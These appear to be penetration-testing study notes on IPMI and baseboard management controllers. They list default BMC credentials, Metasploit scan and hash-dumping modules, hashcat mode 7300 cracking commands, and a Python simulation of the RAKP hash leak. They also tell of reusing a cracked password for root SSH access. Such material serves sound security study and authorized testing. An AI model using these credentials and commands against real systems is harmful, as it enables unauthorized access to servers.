IPMI
Table of Contents
- default passwords
- Flaw in RAKP protocol in IPMI 2.0 to get password hash
- Intelligent Platform Management Interface General Information
- port: UDP/623
- nmap version scan -> sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local
- metasploit version scan -> msf6 > use auxiliary/scanner/ipmi/ipmi_version
default passwords:
| Product | Username | Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | randomized 8-character string consisting of numbers and uppercase letters |
| Supermicro IPMI | ADMIN | ADMIN |
It is also essential to try out known default passwords for ANY services that we discover, as these are often left unchanged and can lead to quick wins. When dealing with BMCs, these default passwords may gain us access to the web console or even command line access via SSH or Telnet.
Flaw in RAKP protocol in IPMI 2.0 to get password hash
During the authentication process, the server sends a salted SHA1 or MD5 hash of the user's password to the client before authentication takes place. This can be leveraged to obtain the password hash for ANY valid user account on the BMC. These password hashes can then be cracked offline with a dictionary attack in Hashcat, mode 7300. In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command: `hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u`, which tries all combinations of uppercase letters and numbers for an eight-character password.
> hashcat -m 7300 -a 0 ipmi.txt /usr/share/wordlists/rockyou.txt
There is no direct "fix" to this issue because the flaw is a critical component of the IPMI specification. Clients can opt for very long, difficult-to-crack passwords or implement network segmentation rules to restrict direct access to the BMCs. It is important not to overlook IPMI during internal penetration tests (we see it during most assessments), because not only can we often gain access to the BMC web console, which is a high-risk finding, but we have seen environments where a unique (but crackable) password is set that is later re-used across other systems. On one such penetration test, we obtained an IPMI hash, cracked it offline using Hashcat, and were able to SSH into many critical servers in the environment as the root user and gain access to web management consoles for various network monitoring tools.
To retrieve IPMI hashes, we can use the Metasploit IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval module.
> use auxiliary/scanner/ipmi/ipmi_dumphashes
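Added example (not from the original notes): a minimal model of the IPMI 2.0 RAKP message 1/2 exchange, showing why the value the BMC returns before any client proof can be checked offline, and why the 36^8 keyspace of an iLO factory password bounds the mask attack above. Session IDs, randoms, GUID and usernames are constructed values.

```python
import hashlib
import hmac
import os
import struct


def rakp2_salt(sid_m: int, sid_c: int, rand_m: bytes, rand_c: bytes,
               guid_c: bytes, role_m: int, username: str) -> bytes:
    """Data the BMC authenticates in RAKP message 2:
    SIDm | SIDc | Rm | Rc | GUIDc | ROLEm | ULENGTHm | UNAMEm."""
    uname = username.encode()
    return (struct.pack("<II", sid_m, sid_c) + rand_m + rand_c + guid_c
            + bytes([role_m, len(uname)]) + uname)


def rakp2_auth_code(password: str, salt: bytes) -> bytes:
    """HMAC-SHA1 keyed with the user's password (KUID). The BMC sends this
    to the client before the client has proven it knows the password."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def bmc_reply(password, sid_m, sid_c, rand_m, guid_c, role_m, username):
    """Simulated BMC side: RAKP message 1 carried sid_m, rand_m, role_m and
    username; the BMC picks its own random and answers with it plus the code."""
    rand_c = os.urandom(16)
    salt = rakp2_salt(sid_m, sid_c, rand_m, rand_c, guid_c, role_m, username)
    return rand_c, rakp2_auth_code(password, salt)


def hashcat_7300_line(salt: bytes, auth_code: bytes) -> str:
    """Hashcat mode 7300 input: <salt hex>:<hmac hex>."""
    return salt.hex() + ":" + auth_code.hex()


def offline_check(candidate: str, salt: bytes, auth_code: bytes) -> bool:
    """One offline guess: recompute from the captured reply and compare.
    No further traffic to the BMC is needed, which is the core of the flaw."""
    return hmac.compare_digest(rakp2_auth_code(candidate, salt), auth_code)


def keyspace(alphabet_size: int, length: int) -> int:
    """Guesses needed for an exhaustive mask, e.g. keyspace(36, 8) for ?d?u x8."""
    return alphabet_size ** length


if __name__ == "__main__":
    rand_m, guid = os.urandom(16), os.urandom(16)
    rand_c, code = bmc_reply("calvin", 0x11223344, 0xAABBCCDD, rand_m, guid, 0x14, "root")
    salt = rakp2_salt(0x11223344, 0xAABBCCDD, rand_m, rand_c, guid, 0x14, "root")
    print(hashcat_7300_line(salt, code))
    print(offline_check("calvin", salt, code), keyspace(36, 8))
```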
Intelligent Platform Management Interface General Information
- hardware-based host management system
- works independently of the host's BIOS, CPU, firmware, and underlying OS
- ability to manage and monitor systems even if powered off or unresponsive
- operates using a direct network connection to the system's hardware
- does not require access via a login shell
- remote upgrades to systems without requiring physical access
- IPMI is typically used in three ways:
  - before the OS has booted, to modify BIOS settings
  - when the host is fully powered down
  - access to a host after a system failure
BMC
- Systems that use the IPMI protocol are called Baseboard Management Controllers (BMCs). BMCs are typically implemented as embedded ARM systems running Linux and connected directly to the host's motherboard. BMCs are built into many motherboards but can also be added to a system as a PCI card. Most servers either come with a BMC or support adding one. The most common BMCs we see during internal penetration tests are HP iLO, Dell DRAC, and Supermicro IPMI. If we can access a BMC during an assessment, we gain full access to the host motherboard and are able to monitor, reboot, power off, or even reinstall the host operating system. Gaining access to a BMC is nearly equivalent to physical access to a system. Many BMCs (including HP iLO, Dell DRAC, and Supermicro IPMI) expose a web-based management console, some sort of command-line remote access protocol such as Telnet or SSH, and UDP port 623, which, again, carries the IPMI network protocol itself.